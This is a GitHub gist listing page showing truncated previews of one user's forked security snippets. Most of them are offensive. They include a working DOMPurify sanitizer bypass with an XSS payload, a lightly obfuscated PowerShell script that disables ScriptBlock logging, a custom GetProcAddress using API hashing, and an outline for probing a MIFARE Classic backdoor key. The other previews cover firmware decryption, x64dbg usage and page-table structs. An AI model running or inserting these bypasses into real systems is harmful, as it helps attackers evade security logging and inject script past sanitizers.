Skip to content

Instantly share code, notes, and snippets.

View gavz's full-sized avatar

gavz

66 followers · 33 following
View GitHub Profile
@gavz
gavz / gist:e7bd406e17b6541f293b2d64979730c0
Created August 17, 2024 22:36 — forked from dmaynor/gist:f1973ae244b5c2ed83d3b8e19f798f97
Mifare crypto backdoor flipper app
Creating a Flipper Zero app to test for this attack involves writing a script that can interact with the RFID module on the Flipper Zero to perform the necessary steps. The Flipper Zero uses a scripting language called **.fap** (Flipper App) format, typically written in C or a high-level scripting language, but it also supports custom Python-like scripting with `flipperzero-tui`.
Here's a basic outline for creating an app that can check for the presence of the backdoor key on a MIFARE Classic card. Note that this is a simplified version and assumes some familiarity with Flipper Zero's development environment.
### **Step 1: Set Up the Development Environment**
1. **Install Flipper Zero SDK:**
- Follow the official [Flipper Zero documentation](https://github.com/flipperdevices/flipperzero-firmware) to set up the SDK and development environment.
2. **Clone the Flipper Zero Firmware:**
@gavz
gavz / app.js
Created July 17, 2024 19:05 — forked from kevin-mizu/app.js
DOMPurify bypass using ISO-2022-JP
const createDOMPurify = require("dompurify");
const { JSDOM } = require("jsdom");
const http = require("http");
const server = http.createServer((req, res) => {
const window = new JSDOM("").window;
const DOMPurify = createDOMPurify(window);
const clean = DOMPurify.sanitize(`<a id="\x1b$B"></a>\x1b(B<a id="><img src=x onerror=alert(1)>"></a>`);
res.statusCode = 200;
@gavz
gavz / arnold.md
Created July 17, 2024 18:53 — forked from EvanMcBroom/arnold.md
IllBeBack - An Undocumented Function

IllBeBack - An Undocumented Function

Microsoft purchased the software Softricity SoftGrid in 2006 and renamed it to Microsoft Application Virtualization, or App-V for short. Windows shipped with several libraries in System32 and SysWOW64 to support App-V.

AppVTerminator.dll

One App-V library stands out from all the rest because it only has one exported function named IllBeBack... That's right! A library signed by Microsoft, with Terminator in the name, that only has a single callable function named IllBeBack.

@gavz
gavz / ScriptBlockLogBypass.ps1
Created June 17, 2024 21:10 — forked from cobbr/ScriptBlockLogBypass.ps1
ScriptBlock Logging Bypass
# ScriptBlock Logging Bypass
# @cobbr_io
$GroupPolicyField = [ref].Assembly.GetType('System.Management.Automation.Utils')."GetFie`ld"('cachedGroupPolicySettings', 'N'+'onPublic,Static')
If ($GroupPolicyField) {
$GroupPolicyCache = $GroupPolicyField.GetValue($null)
If ($GroupPolicyCache['ScriptB'+'lockLogging']) {
$GroupPolicyCache['ScriptB'+'lockLogging']['EnableScriptB'+'lockLogging'] = 0
$GroupPolicyCache['ScriptB'+'lockLogging']['EnableScriptBlockInvocationLogging'] = 0
}
@gavz
gavz / CheckHvpt.c
Created June 17, 2024 20:54 — forked from tandasat/CheckHvpt.c
C code to check HVPT availability
#include <stdio.h>
#include <assert.h>
#include <Windows.h>
// Some of them taken (and modified) from https://github.com/winsiderss/systeminformer
typedef struct _SYSTEM_ISOLATED_USER_MODE_INFORMATION
{
BOOLEAN SecureKernelRunning : 1;
BOOLEAN HvciEnabled : 1;
@gavz
gavz / 0000-thecus-firmware-decrypt.sh
Created June 12, 2024 22:47 — forked from nstarke/0000-thecus-firmware-decrypt.sh
Thecus Firmware Decrypt Bash Script
#!/bin/bash
#
# This script takes a Thecus Firmware Image and decrypts it.
# The encryption key is based off of one of the supported
# models, which are listed in the firmware filename. This
# script will try all of the model names in the file name
# and delete any that do not decrypt to a gzip file.
#
# You will need the following c program compiled and passed
@gavz
gavz / log_and_scripts_api_resolving_with_x64dbg.md
Created May 30, 2024 23:28 — forked from a1ext/log_and_scripts_api_resolving_with_x64dbg.md
Log and scripts used in the following video [Resolving APIs dynamically with Labeless & x64dbg] https://youtu.be/hMWuWVRkpB0

Resolving APIs dynamically with Labeless & x64dbg

Previous part Resolving APIs dynamically with Labeless & OllyDbg2

Hi, now we try to do the same things using x64dbg with x64-bit target application...

Let's try to find out the difference we need to make in IDA python script...

As the base, I use the previous script (see video how to do the same in OllyDbg 2)

@gavz
gavz / get_proc_address.c
Created May 28, 2024 20:18 — forked from mr-r3bot/get_proc_address.c
Customized GetProcAddress and GetModuleHandle and handle redirected function with API hashing
UINT32 HashStringJenkinsOneAtATime32BitA(_In_ PCHAR String)
{
SIZE_T Index = 0;
UINT32 Hash = 0;
SIZE_T Length = lstrlenA(String);
while (Index != Length)
{
Hash += String[Index++];
Hash += Hash << INITIAL_SEED;
@gavz
gavz / pml4e.c
Created May 13, 2024 22:22 — forked from mvankuipers/pml4e.c
Structure defining a PML4 entry in IA-32e paging.
typedef struct _PML4E
{
union
{
struct
{
ULONG64 Present : 1; // Must be 1, region invalid if 0.
ULONG64 ReadWrite : 1; // If 0, writes not allowed.
ULONG64 UserSupervisor : 1; // If 0, user-mode accesses not allowed.
ULONG64 PageWriteThrough : 1; // Determines the memory type used to access PDPT.
@gavz
gavz / pdpte.c
Created May 13, 2024 22:22 — forked from mvankuipers/pdpte.c
Structure defining a page directory pointer table (PDPT) entry in IA-32e paging.
typedef struct _PDPTE
{
union
{
struct
{
ULONG64 Present : 1; // Must be 1, region invalid if 0.
ULONG64 ReadWrite : 1; // If 0, writes not allowed.
ULONG64 UserSupervisor : 1; // If 0, user-mode accesses not allowed.
ULONG64 PageWriteThrough : 1; // Determines the memory type used to access PD.